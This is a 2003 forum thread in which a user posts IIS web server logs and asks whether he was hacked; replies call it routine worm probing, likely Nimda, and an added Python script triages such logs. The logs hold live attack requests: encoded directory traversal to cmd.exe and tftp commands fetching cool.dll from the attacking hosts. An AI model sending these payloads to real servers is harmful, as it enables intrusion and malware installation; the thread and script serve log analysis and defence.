|
| hack? From : McBrain |
Date : 22-02-03 18:43 |
|
Is this someone who has hacked my web server?....my IP is xxxxxxxx?
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-02-21 13:34:12 192.168.0.2 - 192.168.0.1 80 PROPFIND /Jonasprøve - 404
Microsoft-WebDAV-MiniRedir/5.1.2600
2003-02-21 14:33:17 80.236.81.176 - xxxxxxxxxx 80 GET /scripts/root.exe
/c+dir 404 -
2003-02-21 14:33:23 80.236.81.176 - xxxxxxxxxx 80 GET /MSADC/root.exe /c+dir
403 -
2003-02-21 14:33:27 80.236.81.176 - xxxxxxxxxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2003-02-21 14:33:32 80.236.81.176 - xxxxxxxxxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2003-02-21 14:33:39 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2003-02-21 14:34:31 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-02-21 14:35:24 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2003-02-21 14:36:22 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2003-02-21 14:36:23 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..%5c../httpodbc.dll - 500 -
2003-02-21 14:36:25 80.236.81.176 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2003-02-21 14:36:35 80.236.81.176 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-02-21 14:36:37 80.236.81.176 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2003-02-21 14:36:41 80.236.81.176 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2003-02-21 14:36:41 80.236.81.176 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../httpodbc.dll - 500 -
2003-02-21 14:36:44 80.236.81.176 - xxxxxxxxxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-02-21 14:36:45 80.236.81.176 - xxxxxxxxxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 403 -
2003-02-21 14:36:47 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2003-02-21 14:36:48 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2003-02-21 14:36:50 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2003-02-21 14:36:55 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/../../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-02-21 18:19:23 80.198.58.140 - xxxxxxxxxx 80 GET /index.htm - 304
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2003-02-21 18:19:23 80.198.58.140 - xxxxxxxxxx 80 GET /ocsc-title.jpg - 304
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2003-02-21 18:20:18 80.198.58.140 - xxxxxxxxxx 80 GET /downloads.htm - 200
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2003-02-21 18:20:18 80.198.58.140 - xxxxxxxxxx 80 GET /downloads.jpg - 304
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2003-02-21 18:20:18 80.198.58.140 - xxxxxxxxxx 80 GET /enter.jpg - 200
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2003-02-21 18:21:24 80.198.58.140 - xxxxxxxxxx 80 GET
/bigk-member-profile.htm - 200
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2003-02-21 18:21:24 80.198.58.140 - xxxxxxxxxx 80 GET /big-k.jpg - 200
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2003-02-21 19:18:51 80.81.70.4 - xxxxxxxxxx 80 GET /scripts/root.exe /c+dir
404 -
2003-02-21 19:18:51 80.81.70.4 - xxxxxxxxxx 80 GET /MSADC/root.exe /c+dir
403 -
2003-02-21 19:18:53 80.81.70.4 - xxxxxxxxxx 80 GET /c/winnt/system32/cmd.exe
/c+dir 404 -
2003-02-21 19:18:53 80.81.70.4 - xxxxxxxxxx 80 GET /d/winnt/system32/cmd.exe
/c+dir 404 -
2003-02-21 19:18:55 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2003-02-21 19:19:44 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-02-21 19:19:44 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2003-02-21 19:19:45 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2003-02-21 19:19:45 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..%5c../httpodbc.dll - 500 -
2003-02-21 19:19:46 80.81.70.4 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2003-02-21 19:19:46 80.81.70.4 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-02-21 19:19:47 80.81.70.4 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2003-02-21 19:19:47 80.81.70.4 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2003-02-21 19:19:49 80.81.70.4 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../httpodbc.dll - 500 -
2003-02-21 19:19:49 80.81.70.4 - xxxxxxxxxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-02-21 19:19:50 80.81.70.4 - xxxxxxxxxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 403 -
2003-02-21 19:19:50 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2003-02-21 19:19:51 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
| |
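Added example, not part of the original thread: a triage pass over IIS log entries like those in the post above. It groups the probe requests by client, separates the ones the server rejected (403/404) from the ones it answered with 200 or a 5xx error, and extracts the file path named in any `tftp` command so that path can be checked on disk. The sample lines are taken from the post with the wrapped lines re-joined; the function names and the field positions are assumptions of this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample: entries from the post above with the wrapped lines re-joined.
# Assumed field order: date time c-ip user s-ip port method uri-stem uri-query status user-agent
SAMPLE_LOG = r"""
2003-02-21 14:33:17 80.236.81.176 - xxxxxxxxxx 80 GET /scripts/root.exe /c+dir 404 -
2003-02-21 14:33:23 80.236.81.176 - xxxxxxxxxx 80 GET /MSADC/root.exe /c+dir 403 -
2003-02-21 14:33:39 80.236.81.176 - xxxxxxxxxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2003-02-21 14:34:31 80.236.81.176 - xxxxxxxxxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-02-21 14:36:23 80.236.81.176 - xxxxxxxxxx 80 GET /scripts/..%5c../httpodbc.dll - 500 -
2003-02-21 18:19:23 80.198.58.140 - xxxxxxxxxx 80 GET /index.htm - 304 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2003-02-21 19:18:51 80.81.70.4 - xxxxxxxxxx 80 GET /scripts/root.exe /c+dir 404 -
2003-02-21 19:18:55 80.81.70.4 - xxxxxxxxxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
"""

PROBE = re.compile(r"cmd\.exe|root\.exe|httpodbc\.dll|\.\.(%5c|/|\\)", re.I)
TFTP = re.compile(r"tftp\s+-i\s+(\S+)\s+GET\s+(\S+)\s+(\S+)", re.I)

def outcome(status):
    """Map the HTTP status to what it means for triage."""
    if status in (403, 404):
        return "rejected"        # server refused the request or found no such target
    if 200 <= status < 300:
        return "served"          # server answered the probe: inspect the host
    return "error"               # not cleanly rejected, failed later: needs review

def triage(log_text):
    """Return {client_ip: {"rejected": n, "served": n, "error": n, "files": set}}."""
    report = defaultdict(lambda: {"rejected": 0, "served": 0, "error": 0, "files": set()})
    for line in log_text.splitlines():
        f = line.split()
        if len(f) < 10 or not f[9].isdigit():
            continue             # skip blanks and lines not in the assumed layout
        client, stem, query, status = f[2], f[7], f[8], int(f[9])
        if not PROBE.search(stem):
            continue             # ordinary page request
        entry = report[client]
        entry[outcome(status)] += 1
        m = TFTP.search(unquote(query.replace("+", " ")))
        if m:                    # local path the request tried to write: check the disk
            entry["files"].add(m.group(3).lower())
    return dict(report)

if __name__ == "__main__":
    for ip, r in triage(SAMPLE_LOG).items():
        print(ip, r)
```

A non-zero "served" or "error" count for a client is the cue to check the server's patch level and look for the listed files on disk.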
Steen Suder, privat (23-02-2003)
| Comment From : Steen Suder, privat |
Date : 23-02-03 00:19 |
|
McBrain wrote:
> Is this someone who has hacked my web server?....my IP is xxxxxxxx?
<SNIP log>
No, I don't think so. It just looks like the usual attack attempts from worms and
script kiddies. Without going into detail about setup and analysis, I can
also say that I see lots of this kind of thing on most web servers.
--
Best regards,
Steen Suder <http://www.suder.dk/>
ICQ UIN 4133803
| |
15kw (23-02-2003)
| Comment From : 15kw |
Date : 23-02-03 16:06 |
|
"McBrain" <jojo@yahoo.dk> wrote in
news:3e57b699$0$15854$edfadb0f@dread11.news.tele.dk
> Is this someone who has hacked my web server?....my IP is xxxxxxxx?
>
>
It looks like the NIMDA worm.
--
Regards
Peter N Petersen
http://peteropfinder.dk
| |